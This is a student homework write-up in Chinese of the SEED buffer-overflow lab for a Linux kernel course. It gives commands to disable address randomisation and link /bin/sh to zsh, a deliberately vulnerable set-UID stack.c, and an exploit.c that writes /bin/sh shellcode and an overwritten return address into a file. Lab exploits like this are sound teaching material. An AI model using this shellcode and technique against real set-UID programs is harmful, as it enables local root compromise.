zoukankan      html  css  js  c++  java
  • 2019-2020-1 20199328《Linux内核原理与分析》第十二周作业

    缓冲区溢出

    2019/12/4 11:33:45


    首先是安装一些用于编译的32位C程序e148
    $ sudo apt-get update

    $ sudo apt-get install -y lib32z1 libc6-dev-i386
    
    $ sudo apt-get install -y lib32readline-gplv2-dev
    

    关闭地址随机化

    $ sudo sysctl -w kernel.randomize_va_space=0
    

    设置zsh文件

    $ sudo su
    
    $ cd /bin
    
    $ rm sh
    
    $ ln -s zsh sh
    
    $ exit
    

    进入linux32位系统并进入/bin/bash

    linux32
    cd /bin/bash
    

    在/tmp下键一个stack.c

    $ cd /tmp
    $ vi stack.c
    

    输入内容:

    /* stack.c */
    

    /* This program has a buffer overflow vulnerability. /
    /
    Our task is to exploit this vulnerability */

    include <stdlib.h>

    include <stdio.h>

    include <string.h>

    int bof(char *str)
    {
    char buffer[12];
    
    /* The following statement has a buffer overflow problem */ 
    strcpy(buffer, str);
    
    return 1;
    }
    
    int main(int argc, char **argv)
    {
    char str[517];
    FILE *badfile;
    
    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 517, badfile);
    bof(str);
    
    printf("Returned Properly
    ");
    return 1;
    }
    

    编译该程序,并设置 SET-UID

     $ sudo su
    
    $ gcc -m32 -g -z execstack -fno-stack-protector -o stack stack.c
    
    $ chmod u+s stack
    
    $ exit
    

    在 /tmp 目录下新建一个 exploit.c 文件,输入如下内容:

    /* exploit.c */
    /* A program that creates a file containing code for launching shell*/
    #include <stdlib.h>
    #include <stdio.h>
    #include <string.h>
    
    char shellcode[] =
    "x31xc0" //xorl %eax,%eax
    "x50" //pushl %eax
    "x68""//sh" //pushl $0x68732f2f
    "x68""/bin" //pushl $0x6e69622f
    "x89xe3" //movl %esp,%ebx
    "x50" //pushl %eax
    "x53" //pushl %ebx
    "x89xe1" //movl %esp,%ecx
    "x99" //cdq
    "xb0x0b" //movb $0x0b,%al
    "xcdx80" //int $0x80
    ;
    
    void main(int argc, char **argv)
    {
    char buffer[517];
    FILE *badfile;
    
    /* Initialize buffer with 0x90 (NOP instruction) */
    memset(&buffer, 0x90, 517);
    
    /* You need to fill the buffer with appropriate contents here */
    strcpy(buffer,"x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x??x??x??x??");   //在buffer特定偏移处起始的四个字节覆盖sellcode地址  
    strcpy(buffer + 100, shellcode);   //将shellcode拷贝至buffer,偏移量设为了 100
    
    /* Save the contents to the file "badfile" */
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 517, 1, badfile);
    fclose(badfile);
    }
    

    gdb 调试
    $ gdb stack

    $ disass main
    

    计算 shellcode 的地址为 0xffffd2d0(十六进制) + 0x64(100的十六进制) = 0xffffd334(十六进制)

    现在修改exploit.c文件!将 x??x??x??x?? 修改为 x34xd3xffxff

    先运行攻击程序 exploit,再运行漏洞程序 stack,观察结果:

  • 相关阅读:
    第十一节 CSS引入的三种方式
    第十节 表单
    第九节 页面布局(简历)
    第八节 HTML表格
    第七节 列表标签
    第六节 链接标签
    第五节 插入图的img标签
    WordPress 全方位优化指南(下)
    Cloud Insight!StatsD 系监控产品新宠!
    WordPress 全方位优化指南(上)
  • 原文地址:https://www.cnblogs.com/llj76720197/p/11982004.html
Copyright © 2011-2022 走看看